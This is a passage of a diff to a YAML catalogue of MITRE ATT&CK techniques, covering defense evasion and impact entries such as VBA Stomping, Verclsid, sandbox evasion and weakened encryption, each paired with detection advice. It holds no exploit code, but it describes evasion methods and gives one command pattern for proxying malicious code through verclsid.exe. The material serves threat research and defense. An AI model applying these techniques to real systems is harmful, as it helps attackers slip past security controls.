+ id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0
description: "Adversaries may employ various time-based methods to detect and
avoid virtualization and analysis environments. This may include timers or
other triggers to avoid a virtual machine environment (VME) or sandbox, specifically
@@ -35479,22 +39960,23 @@ defense-evasion:
Delays may also be based on waiting for specific victim conditions to be met
(ex: system time, events, etc.) or employ scheduled [Multi-Stage Channels](https://attack.mitre.org/techniques/T1104)
to avoid analysis and scrutiny. "
- id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- - kill_chain_name: mitre-attack
- phase_name: discovery
- modified: '2020-07-01T16:32:02.532Z'
- created: '2020-03-06T21:11:11.225Z'
- x_mitre_defense_bypassed:
- - Host forensic analysis
- - Signature-based detection
- - Static File Analysis
- - Anti-virus
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
+ name: Time Based Evasion
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1497.003
+ url: https://attack.mitre.org/techniques/T1497/003
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_contributors:
+ - Deloitte Threat Library Team
+ x_mitre_data_sources:
+ - Process monitoring
+ - Process command-line parameters
x_mitre_detection: 'Time-based evasion will likely occur in the first steps
of an operation but may also occur throughout as an adversary learns the environment.
Data and events should not be viewed in isolation, but as part of a chain
@@ -35504,15 +39986,13 @@ defense-evasion:
implementation and monitoring required. Monitoring for suspicious processes
being spawned that gather a variety of system information or perform other
forms of Discovery, especially in a short period of time, may aid in detection. '
- x_mitre_data_sources:
- - Process monitoring
- - Process command-line parameters
- x_mitre_contributors:
- - Deloitte Threat Library Team
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
+ x_mitre_defense_bypassed:
+ - Host forensic analysis
+ - Signature-based detection
+ - Static File Analysis
+ - Anti-virus
atomic_tests: []
T1070.006:
technique:
@@ -35883,6 +40363,8 @@ defense-evasion:
Adversaries may also communicate with an already open port, but the service listening on that port will only respond to commands or trigger other malicious functionality if passed the appropriate magic value(s).
The observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r (Citation: Hartrell cd00r 2002), is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs.
+
+ On network devices, adversaries may use crafted packets to enable [Network Device Authentication](https://attack.mitre.org/techniques/T1556/004) for standard services offered by the device such as telnet. Such signaling may also be used to open a closed service port such as telnet, or to trigger module modification of malware implants on the device, adding, removing, or changing malicious capabilities.(Citation: Cisco Synful Knock Evolution) (Citation: FireEye - Synful Knock) (Citation: Cisco Blog Legacy Device Attacks) To enable this traffic signaling on embedded devices, adversaries must first achieve and leverage [Patch System Image](https://attack.mitre.org/techniques/T1601/001) due to the monolithic nature of the architecture.
external_references:
- source_name: mitre-attack
external_id: T1205
@@ -35891,6 +40373,18 @@ defense-evasion:
description: 'Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible
backdoor. Retrieved October 13, 2018.'
source_name: Hartrell cd00r 2002
+ - source_name: Cisco Synful Knock Evolution
+ url: https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices
+ description: Graham Holmes. (2015, October 8). Evolution of attacks on Cisco
+ IOS devices. Retrieved October 19, 2020.
+ - source_name: FireEye - Synful Knock
+ url: https://www.fireeye.com/blog/threat-research/2015/09/synful_knock_-_acis.html
+ description: Bill Hau, Tony Lee, Josh Homan. (2015, September 15). SYNful
+ Knock - A Cisco router implant - Part I. Retrieved October 19, 2020.
+ - source_name: Cisco Blog Legacy Device Attacks
+ url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
+ description: Omar Santos. (2020, October 19). Attackers Continue to Target
+ Legacy Devices. Retrieved October 20, 2020.
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
type: attack-pattern
@@ -35901,7 +40395,7 @@ defense-evasion:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: command-and-control
- modified: '2020-07-01T18:27:41.755Z'
+ modified: '2020-10-21T15:30:44.964Z'
created: '2018-04-18T17:59:24.739Z'
x_mitre_contributors:
- Josh Day, Gigamon
@@ -35914,12 +40408,13 @@ defense-evasion:
- Linux
- macOS
- Windows
+ - Network
x_mitre_network_requirements: true
x_mitre_detection: Record network packets sent to and from the system, looking
for extraneous packets that do not belong to established flows.
x_mitre_defense_bypassed:
- Defensive network service scanning
- x_mitre_version: '2.0'
+ x_mitre_version: '2.1'
x_mitre_is_subtechnique: false
atomic_tests: []
T1127:
@@ -36080,7 +40575,7 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: lateral-movement
- modified: '2020-03-24T12:36:24.608Z'
+ modified: '2020-09-16T19:40:44.714Z'
created: '2020-01-30T16:18:36.873Z'
x_mitre_version: '1.0'
x_mitre_is_subtechnique: false
@@ -36181,6 +40676,75 @@ defense-evasion:
- macOS
- Windows
atomic_tests: []
+ T1564.007:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1564.007
+ url: https://attack.mitre.org/techniques/T1564/007
+ - source_name: FireEye VBA stomp Feb 2020
+ url: https://www.fireeye.com/blog/threat-research/2020/01/stomp-2-dis-brilliance-in-the-visual-basics.html
+ description: 'Cole, R., Moore, A., Stark, G., Stancill, B. (2020, February
+ 5). STOMP 2 DIS: Brilliance in the (Visual) Basics. Retrieved September
+ 17, 2020.'
+ - source_name: Evil Clippy May 2019
+ url: https://outflank.nl/blog/2019/05/05/evil-clippy-ms-office-maldoc-assistant/
+ description: 'Hegt, S. (2019, May 5). Evil Clippy: MS Office maldoc assistant.
+ Retrieved September 17, 2020.'
+ - source_name: Microsoft _VBA_PROJECT Stream
+ url: https://docs.microsoft.com/en-us/openspecs/office_file_formats/ms-ovba/ef7087ac-3974-4452-aab2-7dba2214d239
+ description: 'Microsoft. (2020, February 19). 2.3.4.1 _VBA_PROJECT Stream:
+ Version Dependent Project Information. Retrieved September 18, 2020.'
+ - source_name: Walmart Roberts Oct 2018
+ url: https://medium.com/walmartglobaltech/vba-stomping-advanced-maldoc-techniques-612c484ab278
+ description: Sayre, K., Ogden, H., Roberts, C. (2018, October 10). VBA Stomping
+ — Advanced Maldoc Techniques. Retrieved September 17, 2020.
+ - source_name: pcodedmp Bontchev
+ url: https://github.com/bontchev/pcodedmp
+ description: Bontchev, V. (2019, July 30). pcodedmp.py - A VBA p-code disassembler.
+ Retrieved September 17, 2020.
+ - source_name: oletools toolkit
+ url: https://github.com/decalage2/oletools
+ description: decalage2. (2019, December 3). python-oletools. Retrieved September
+ 18, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: VBA Stomping
+ description: |-
+ Adversaries may hide malicious Visual Basic for Applications (VBA) payloads embedded within MS Office documents by replacing the VBA source code with benign data.(Citation: FireEye VBA stomp Feb 2020)
+
+ MS Office documents with embedded VBA content store source code inside of module streams. Each module stream has a PerformanceCache that stores a separate compiled version of the VBA source code known as p-code. The p-code is executed when the MS Office version specified in the _VBA_PROJECT stream (which contains the version-dependent description of the VBA project) matches the version of the host MS Office application.(Citation: Evil Clippy May 2019)(Citation: Microsoft _VBA_PROJECT Stream)
+
+ An adversary may hide malicious VBA code by overwriting the VBA source code location with zero’s, benign code, or random bytes while leaving the previously compiled malicious p-code. Tools that scan for malicious VBA source code may be bypassed as the unwanted code is hidden in the compiled p-code. If the VBA source code is removed, some tools might even think that there are no macros present. If there is a version match between the _VBA_PROJECT stream and host MS Office application, the p-code will be executed, otherwise the benign VBA source code will be decompressed and recompiled to p-code, thus removing malicious p-code and potentially bypassing dynamic analysis.(Citation: Walmart Roberts Oct 2018)(Citation: FireEye VBA stomp Feb 2020)(Citation: pcodedmp Bontchev)
+ id: attack-pattern--c898c4b5-bf36-4e6e-a4ad-5b8c4c13e35b
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ modified: '2020-09-23T11:31:50.407Z'
+ created: '2020-09-17T12:51:40.845Z'
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_system_requirements:
+ - MS Office version specified in _VBA_PROJECT stream must match
+ host
+ x_mitre_permissions_required:
+ - User
+ x_mitre_detection: |-
+ Detection efforts should be placed finding differences between VBA source code and p-code.(Citation: Walmart Roberts Oct 2018) VBA code can be extracted from p-code before execution with tools such as the pcodedmp disassembler. The oletools toolkit leverages the pcodedmp disassembler to detect VBA stomping by comparing keywords present in the VBA source code and p-code.(Citation: pcodedmp Bontchev)(Citation: oletools toolkit)
+
+ If the document is opened with a Graphical User Interface (GUI) the malicious p-code is decompiled and may be viewed. However, if the PROJECT stream, which specifies the project properties, is modified in a specific way the decompiled VBA code will not be displayed. For example, adding a module name that is undefined to the PROJECT stream will inhibit attempts of reading the VBA source code through the GUI.(Citation: FireEye VBA stomp Feb 2020)
+ x_mitre_data_sources:
+ - Process monitoring
+ - File monitoring
+ x_mitre_contributors:
+ - Rick Cole, FireEye
+ x_mitre_platforms:
+ - Linux
+ - Windows
+ - macOS
+ atomic_tests: []
T1055.014:
technique:
id: attack-pattern--98be40f2-c86b-4ade-b6fc-4964932040e5
@@ -36273,13 +40837,8 @@ defense-evasion:
atomic_tests: []
T1078:
technique:
- id: attack-pattern--b17a1a56-e99c-403c-8948-561df0cffe81
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Valid Accounts
- description: |-
- Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
-
- The overlap of permissions for local, domain, and cloud accounts across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) to bypass access controls set within the enterprise. (Citation: TechNet Credential Theft)
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1078
@@ -36295,8 +40854,13 @@ defense-evasion:
description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
June 3, 2016.
source_name: TechNet Audit Policy
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ description: |-
+ Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
+
+ The overlap of permissions for local, domain, and cloud accounts across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) to bypass access controls set within the enterprise. (Citation: TechNet Credential Theft)
+ name: Valid Accounts
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ id: attack-pattern--b17a1a56-e99c-403c-8948-561df0cffe81
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
@@ -36307,13 +40871,31 @@ defense-evasion:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
- modified: '2020-06-20T22:44:36.043Z'
+ modified: '2020-10-19T16:01:22.724Z'
created: '2017-05-31T21:31:00.645Z'
- x_mitre_is_subtechnique: false
- x_mitre_contributors:
- - Netskope
- - Mark Wee
- - Praetorian
+ x_mitre_version: '2.1'
+ x_mitre_data_sources:
+ - AWS CloudTrail logs
+ - Stackdriver logs
+ - Authentication logs
+ - Process monitoring
+ x_mitre_defense_bypassed:
+ - Firewall
+ - Host intrusion prevention systems
+ - Network intrusion detection system
+ - Application control
+ - System access controls
+ - Anti-virus
+ x_mitre_detection: |-
+ Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services. (Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
+
+ Perform regular audits of domain and local system accounts to detect accounts that may have been created by an adversary for persistence. Checks on these accounts could also include whether default accounts such as Guest have been activated. These audits should also include checks on any appliances and applications for default credentials or SSH keys, and if any are discovered, they should be updated immediately.
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ x_mitre_effective_permissions:
+ - User
+ - Administrator
x_mitre_platforms:
- Linux
- macOS
@@ -36324,45 +40906,98 @@ defense-evasion:
- SaaS
- Office 365
- Azure AD
- x_mitre_effective_permissions:
- - User
- - Administrator
- x_mitre_permissions_required:
- - User
- - Administrator
- x_mitre_detection: |-
- Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services. (Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
-
- Perform regular audits of domain and local system accounts to detect accounts that may have been created by an adversary for persistence. Checks on these accounts could also include whether default accounts such as Guest have been activated. These audits should also include checks on any appliances and applications for default credentials or SSH keys, and if any are discovered, they should be updated immediately.
- x_mitre_defense_bypassed:
- - Firewall
- - Host intrusion prevention systems
- - Network intrusion detection system
- - Application control
- - System access controls
- - Anti-virus
- x_mitre_data_sources:
- - AWS CloudTrail logs
- - Stackdriver logs
- - Authentication logs
- - Process monitoring
- x_mitre_version: '2.1'
+ x_mitre_contributors:
+ - Netskope
+ - Mark Wee
+ - Praetorian
+ x_mitre_is_subtechnique: false
atomic_tests: []
- T1497:
+ T1218.012:
technique:
external_references:
- source_name: mitre-attack
- external_id: T1497
- url: https://attack.mitre.org/techniques/T1497
- - source_name: Unit 42 Pirpi July 2015
- url: https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/
- description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations
- on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April
- 23, 2019.'
+ external_id: T1218.012
+ url: https://attack.mitre.org/techniques/T1218/012
+ - source_name: WinOSBite verclsid.exe
+ url: https://www.winosbite.com/verclsid-exe/
+ description: verclsid-exe. (2019, December 17). verclsid.exe File Information
+ - What is it & How to Block . Retrieved August 10, 2020.
+ - source_name: LOLBAS Verclsid
+ url: https://lolbas-project.github.io/lolbas/Binaries/Verclsid/
+ description: LOLBAS. (n.d.). Verclsid.exe. Retrieved August 10, 2020.
+ - source_name: Red Canary Verclsid.exe
+ url: https://redcanary.com/blog/verclsid-exe-threat-detection/
+ description: 'Haag, M., Levan, K. (2017, April 6). Old Phishing Attacks Deploy
+ a New Methodology: Verclsid.exe. Retrieved August 10, 2020.'
+ - source_name: BOHOPS Abusing the COM Registry
+ url: https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/
+ description: 'BOHOPS. (2018, August 18). Abusing the COM Registry Structure
+ (Part 2): Hijacking & Loading Techniques. Retrieved August 10, 2020.'
+ - source_name: Nick Tyrer GitHub
+ url: https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5
+ description: Tyrer, N. (n.d.). Instructions. Retrieved August 10, 2020.
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Virtualization/Sandbox Evasion
+ name: Verclsid
+ description: "Adversaries may abuse verclsid.exe to proxy execution of malicious
+ code. Verclsid.exe is known as the Extension CLSID Verification Host and is
+ responsible for verifying each shell extension before they are used by Windows
+ Explorer or the Windows Shell.(Citation: WinOSBite verclsid.exe)\n\nAdversaries
+ may abuse verclsid.exe to execute malicious payloads. This may be achieved
+ by running verclsid.exe /S /C {CLSID}, where the file is referenced
+ by a Class ID (CLSID), a unique identification number used to identify COM
+ objects. COM payloads executed by verclsid.exe may be able to perform various
+ malicious actions, such as loading and executing COM scriptlets (SCT) from
+ remote servers (similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010)).
+ Since it is signed and native on Windows systems, proxying execution via verclsid.exe
+ may bypass application control solutions that do not account for its potential
+ abuse.(Citation: LOLBAS Verclsid)(Citation: Red Canary Verclsid.exe)(Citation:
+ BOHOPS Abusing the COM Registry)(Citation: Nick Tyrer GitHub) "
+ id: attack-pattern--808e6329-ca91-4b87-ac2d-8eadc5f8f327
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ modified: '2020-08-19T19:29:18.138Z'
+ created: '2020-08-10T13:59:38.443Z'
+ x_mitre_defense_bypassed:
+ - Application control
+ - Digital Certificate Validation
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
+ x_mitre_detection: Use process monitoring to monitor the execution and arguments
+ of verclsid.exe. Compare recent invocations of verclsid.exe with prior history
+ of known good arguments and loaded files to determine anomalous and potentially
+ adversarial activity. Command arguments used before and after the invocation
+ of verclsid.exe may also be useful in determining the origin and purpose of
+ the payload being executed. Depending on the environment, it may be unusual
+ for verclsid.exe to have a parent process of a Microsoft Office product. It
+ may also be unusual for verclsid.exe to have any child processes or to make
+ network connections or file modifications.
+ x_mitre_data_sources:
+ - Process use of network
+ - Process command-line parameters
+ - Process monitoring
+ - File monitoring
+ x_mitre_contributors:
+ - Rodrigo Garcia, Red Canary
+ x_mitre_platforms:
+ - Windows
+ atomic_tests: []
+ T1497:
+ technique:
+ created: '2019-04-17T22:22:24.505Z'
+ modified: '2020-07-01T16:32:02.272Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ - kill_chain_name: mitre-attack
+ phase_name: discovery
+ type: attack-pattern
+ id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d
description: "Adversaries may employ various means to detect and avoid virtualization
and analysis environments. This may include changing behaviors based on the
results of checks for the presence of artifacts indicative of a virtual machine
@@ -36379,16 +41014,35 @@ defense-evasion:
if it is in an analysis environment. Additional methods include use of sleep
timers or loops within malware code to avoid operating within a temporary
sandbox.(Citation: Unit 42 Pirpi July 2015)\n\n"
- id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- - kill_chain_name: mitre-attack
- phase_name: discovery
- modified: '2020-07-01T16:32:02.272Z'
- created: '2019-04-17T22:22:24.505Z'
- x_mitre_version: '1.2'
+ name: Virtualization/Sandbox Evasion
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1497
+ url: https://attack.mitre.org/techniques/T1497
+ - source_name: Unit 42 Pirpi July 2015
+ url: https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/
+ description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations
+ on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April
+ 23, 2019.'
+ x_mitre_is_subtechnique: false
+ x_mitre_defense_bypassed:
+ - Anti-virus
+ - Host forensic analysis
+ - Signature-based detection
+ - Static File Analysis
+ x_mitre_contributors:
+ - Deloitte Threat Library Team
+ - Sunny Neo
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
+ x_mitre_data_sources:
+ - Process monitoring
+ - Process command-line parameters
x_mitre_detection: Virtualization, sandbox, user activity, and related discovery
techniques will likely occur in the first steps of an operation but may also
occur throughout as an adversary learns the environment. Data and events should
@@ -36399,22 +41053,53 @@ defense-evasion:
required. Monitoring for suspicious processes being spawned that gather a
variety of system information or perform other forms of Discovery, especially
in a short period of time, may aid in detection.
+ x_mitre_version: '1.2'
+ atomic_tests: []
+ T1600:
+ technique:
+ id: attack-pattern--1f9012ef-1e10-4e48-915e-e03563435fe8
+ description: |-
+ Adversaries may compromise a network device’s encryption capability in order to bypass encryption that would otherwise protect data communications. (Citation: Cisco Synful Knock Evolution)
+
+ Encryption can be used to protect transmitted network traffic to maintain its confidentiality (protect against unauthorized disclosure) and integrity (protect against unauthorized changes). Encryption ciphers are used to convert a plaintext message to ciphertext and can be computationally intensive to decipher without the associated decryption key. Typically, longer keys increase the cost of cryptanalysis, or decryption without the key.
+
+ Adversaries can compromise and manipulate devices that perform encryption of network traffic. For example, through behaviors such as [Modify System Image](https://attack.mitre.org/techniques/T1601), [Reduce Key Space](https://attack.mitre.org/techniques/T1600/001), and [Disable Crypto Hardware](https://attack.mitre.org/techniques/T1600/002), an adversary can negatively effect and/or eliminate a device’s ability to securely encrypt network traffic. This poses a greater risk of unauthorized disclosure and may help facilitate data manipulation, Credential Access, or Collection efforts. (Citation: Cisco Blog Legacy Device Attacks)
+ name: Weaken Encryption
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1600
+ url: https://attack.mitre.org/techniques/T1600
+ - source_name: Cisco Synful Knock Evolution
+ url: https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices
+ description: Graham Holmes. (2015, October 8). Evolution of attacks on Cisco
+ IOS devices. Retrieved October 19, 2020.
+ - source_name: Cisco Blog Legacy Device Attacks
+ url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
+ description: Omar Santos. (2020, October 19). Attackers Continue to Target
+ Legacy Devices. Retrieved October 20, 2020.
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ modified: '2020-10-21T22:37:49.258Z'
+ created: '2020-10-19T18:47:08.759Z'
x_mitre_data_sources:
- - Process monitoring
- - Process command-line parameters
+ - File monitoring
x_mitre_platforms:
- - Windows
- - macOS
- - Linux
- x_mitre_contributors:
- - Deloitte Threat Library Team
- - Sunny Neo
+ - Network
+ x_mitre_detection: There is no documented method for defenders to directly identify
+ behaviors that weaken encryption. Detection efforts may be focused on closely
+ related adversary behaviors, such as [Modify System Image](https://attack.mitre.org/techniques/T1601).
+ Some detection methods require vendor support to aid in investigation.
x_mitre_defense_bypassed:
- - Anti-virus
- - Host forensic analysis
- - Signature-based detection
- - Static File Analysis
+ - Encryption
+ x_mitre_permissions_required:
+ - Administrator
x_mitre_is_subtechnique: false
+ x_mitre_version: '1.0'
atomic_tests: []
T1550.004:
technique:
@@ -36422,6 +41107,9 @@ defense-evasion:
- source_name: mitre-attack
external_id: T1550.004
url: https://attack.mitre.org/techniques/T1550/004
+ - external_id: CAPEC-60
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/60.html
- description: Rehberger, J. (2018, December). Pivot to the Cloud using Pass
the Cookie. Retrieved April 5, 2019.
url: https://wunderwuzzi23.github.io/blog/passthecookie.html
@@ -36447,9 +41135,9 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: lateral-movement
- modified: '2020-03-24T12:36:24.501Z'
+ modified: '2020-09-16T19:40:44.527Z'
created: '2020-01-30T17:48:49.395Z'
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_is_subtechnique: true
x_mitre_defense_bypassed:
- System Access Controls
@@ -36500,15 +41188,15 @@ defense-evasion:
Windows implements file and directory ACLs as Discretionary Access Control Lists (DACLs).(Citation: Microsoft DACL May 2018) Similar to a standard ACL, DACLs identifies the accounts that are allowed or denied access to a securable object. When an attempt is made to access a securable object, the system checks the access control entries in the DACL in order. If a matching entry is found, access to the object is granted. Otherwise, access is denied.(Citation: Microsoft Access Control Lists May 2018)
- Adversaries can interact with the DACLs using built-in Windows commands, such as `icacls`, `takeown`, and `attrib`, which can grant adversaries higher permissions on specific files and folders. Further, [PowerShell](https://attack.mitre.org/techniques/T1059/001) provides cmdlets that can be used to retrieve or modify file and directory DACLs. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), [Boot or Logon Initialization Scripts](https://attack.mitre.org/techniques/T1037), or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574).
+ Adversaries can interact with the DACLs using built-in Windows commands, such as `icacls`, `cacls`, `takeown`, and `attrib`, which can grant adversaries higher permissions on specific files and folders. Further, [PowerShell](https://attack.mitre.org/techniques/T1059/001) provides cmdlets that can be used to retrieve or modify file and directory DACLs. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), [Boot or Logon Initialization Scripts](https://attack.mitre.org/techniques/T1037), or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574).
id: attack-pattern--34e793de-0274-4982-9c1a-246ed1c19dee
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-29T23:07:55.953Z'
+ modified: '2020-09-01T20:05:05.268Z'
created: '2020-02-04T19:17:41.767Z'
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_is_subtechnique: true
x_mitre_permissions_required:
- User
@@ -37312,13 +42000,13 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
- modified: '2020-03-27T21:09:28.699Z'
+ modified: '2020-10-14T14:52:11.708Z'
created: '2019-03-15T13:59:30.390Z'
x_mitre_is_subtechnique: false
x_mitre_impact_type:
- Availability
x_mitre_detection: |-
- Use process monitoring to monitor the execution and command line parameters of of binaries involved in data destruction activity, such as vssadmin, wbadmin, and bcdedit. Monitor for the creation of suspicious files as well as unusual file modification activity. In particular, look for large quantities of file modifications in user directories.
+ Use process monitoring to monitor the execution and command line parameters of binaries involved in data destruction activity, such as vssadmin, wbadmin, and bcdedit. Monitor for the creation of suspicious files as well as unusual file modification activity. In particular, look for large quantities of file modifications in user directories.
In some cases, monitoring for unusual kernel driver installation activity can aid in detection.
x_mitre_data_sources:
@@ -37432,6 +42120,12 @@ impact:
- source_name: mitre-attack
external_id: T1498.001
url: https://attack.mitre.org/techniques/T1498/001
+ - external_id: CAPEC-125
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/125.html
+ - external_id: CAPEC-486
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/486.html
- source_name: USNYAG IranianBotnet March 2016
url: https://www.justice.gov/opa/pr/seven-iranians-working-islamic-revolutionary-guard-corps-affiliated-entities-charged
description: Preet Bharara, US Attorney. (2016, March 24). Retrieved April
@@ -37453,7 +42147,7 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
- modified: '2020-03-29T01:10:52.360Z'
+ modified: '2020-09-16T15:57:12.410Z'
created: '2020-03-02T20:07:18.651Z'
x_mitre_data_sources:
- Sensor health and status
@@ -37473,7 +42167,7 @@ impact:
time may be small and the indicator of an event availability of the network
or service drops. The analysis tools mentioned can then be used to determine
the type of DoS causing the outage and help with remediation.'
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_is_subtechnique: true
x_mitre_impact_type:
- Availability
@@ -37754,7 +42448,7 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
- modified: '2020-03-29T02:07:27.676Z'
+ modified: '2020-09-16T15:56:03.459Z'
created: '2019-04-18T11:00:55.862Z'
x_mitre_is_subtechnique: false
x_mitre_detection: |-
@@ -38158,7 +42852,7 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
- modified: '2020-03-29T01:11:28.903Z'
+ modified: '2020-09-16T15:58:18.788Z'
created: '2019-04-17T20:23:15.105Z'
x_mitre_is_subtechnique: false
x_mitre_detection: 'Detection of Network DoS can sometimes be achieved before
@@ -38199,6 +42893,12 @@ impact:
- source_name: mitre-attack
external_id: T1499.001
url: https://attack.mitre.org/techniques/T1499/001
+ - external_id: CAPEC-469
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/469.html
+ - external_id: CAPEC-482
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/482.html
- source_name: Arbor AnnualDoSreport Jan 2018
url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
description: Philippe Alcoy, Steinthor Bjarnason, Paul Bowen, C.F. Chui, Kirill
@@ -38232,9 +42932,9 @@ impact:
kill_chain_phases:
